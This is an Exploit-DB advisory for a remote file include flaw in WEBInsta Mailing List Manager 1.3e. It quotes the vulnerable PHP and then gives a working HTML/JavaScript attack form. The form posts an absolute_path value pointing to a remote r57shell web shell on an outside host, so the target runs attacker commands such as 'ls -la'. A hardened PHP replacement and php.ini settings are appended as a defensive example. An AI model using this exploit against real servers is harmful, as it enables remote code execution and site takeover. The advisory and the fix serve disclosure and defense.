WEBInsta MM <= 1.3e absolute_path Remote File Include Exploit

2006-08-15T00:00:00
ID EDB-ID:2187
Type exploitdb
Reporter str0ke
Modified 2006-08-15T00:00:00

Description

WEBInsta MM <= 1.3e (absolute_path) Remote File Include Exploit. Webapps exploit for php platform

<!--
vulnerable code: /maillist/inc/initdb.php
-----------------------------------------------------------------------
if(isset($_GET['absolute_path']))
 {
echo "no access from here !!";
exit;
}

include($absolute_path.'inc/adodbt/db.inc');
-----------------------------------------------------------------------
The above snippet only checks $_GET, so it does not stop POST requests that set the absolute_path variable.

A r57shell with a twist.

o---[ r57shell - http-shell by RST/GHC | http://rst.void.ru | http://ghc.ru | version 1.31 ]---o

/str0ke ! milw0rm.com
-->

<head>
<title>WEBInsta Mailing List Manager <= 1.3e (initdb.php) Remote File Include Exploit</title>
</head>
<script language="JavaScript">
function milw0rm() {
  if (document.exploit.target.value=="") {
    alert("Enter a Target");
    return false;
  }

  exploit.action= document.exploit.target.value;
  exploit.cmd.value=document.exploit.cmd.value;
  exploit.dir.value=document.exploit.dir.value;
  exploit.submit();
}
</script>
<body>
<form name="exploit" target="exploitframe" method="post" onSubmit="milw0rm();">
  <table width="975" border="0">
    <tr>
      <td width="961" align="left" valign="top" nowrap="nowrap"><strong>WEBInsta Mailing List Manager <= 1.3e (initdb.php) Remote File Include Exploit</strong></td>

    </tr>
    <tr>
      <td><em>
        <input type="hidden" name="absolute_path" value="http://rst.void.ru/download/r57shell.txt?&" />
        </em><strong>*</strong><em>target</em>
        <input name="target" type="text" value="http://www.site.com/maillist/inc/initdb.php" size="50" maxlength="150" />
        <strong> *</strong><em>cmd</em>

        <input name="cmd" type="text" value="ls -la">
        <strong>*</strong><em>dir</em>
        <input name="dir" type="text" value=".">
        <em>
        <input type="submit" name="Submit" value="Exploit" />
        </em></td>
    </tr>
  </table>

  <p>
    <iframe name="exploitframe" height="410" width="1100" scrolling="yes" frameborder="0"></iframe>
  </p>
</form>
</body>
</html>

# milw0rm.com [2006-08-15]
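
A hardened form of the include from /maillist/inc/initdb.php, added here as an example; it is not the vendor's patch and not part of the original advisory. It assumes the request value reaches $absolute_path through PHP's register_globals, and resolve_local_include() is a hypothetical helper name.

```php
<?php
// Added example: hardened replacement for the include in initdb.php.

// The original check looked only at $_GET. Reject the parameter on every
// request channel that register_globals can copy into $absolute_path.
foreach (array($_GET, $_POST, $_COOKIE) as $source) {
    if (isset($source['absolute_path'])) {
        header('HTTP/1.1 403 Forbidden');
        exit('no access from here');
    }
}

// Hypothetical helper: resolve $relative under $base and return the real
// path only if it is an existing local file inside $base. URLs, stream
// wrappers and ../ traversal all fail realpath() or the prefix check.
function resolve_local_include($base, $relative)
{
    $root = realpath($base);
    $path = realpath($base . DIRECTORY_SEPARATOR . $relative);
    if ($root === false || $path === false) {
        return false;
    }
    $root = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($path, $root, strlen($root)) !== 0 || !is_file($path)) {
        return false;
    }
    return $path;
}

// Derive the base path from this file's own location (initdb.php sits in
// <app>/inc/), overwriting anything injected from the request.
$absolute_path = dirname(dirname(__FILE__)) . DIRECTORY_SEPARATOR;

$db_inc = resolve_local_include($absolute_path, 'inc/adodbt/db.inc');
if ($db_inc === false) {
    header('HTTP/1.1 500 Internal Server Error');
    exit('configuration error');
}
include $db_inc;

// Defense in depth, php.ini:
//   register_globals  = Off
//   allow_url_include = Off
//   allow_url_fopen   = Off   ; only if the application needs no remote fopen
```

The unconditional assignment to $absolute_path is what closes the hole; the per-channel rejection and the php.ini settings only reduce exposure if another include in the application repeats the pattern.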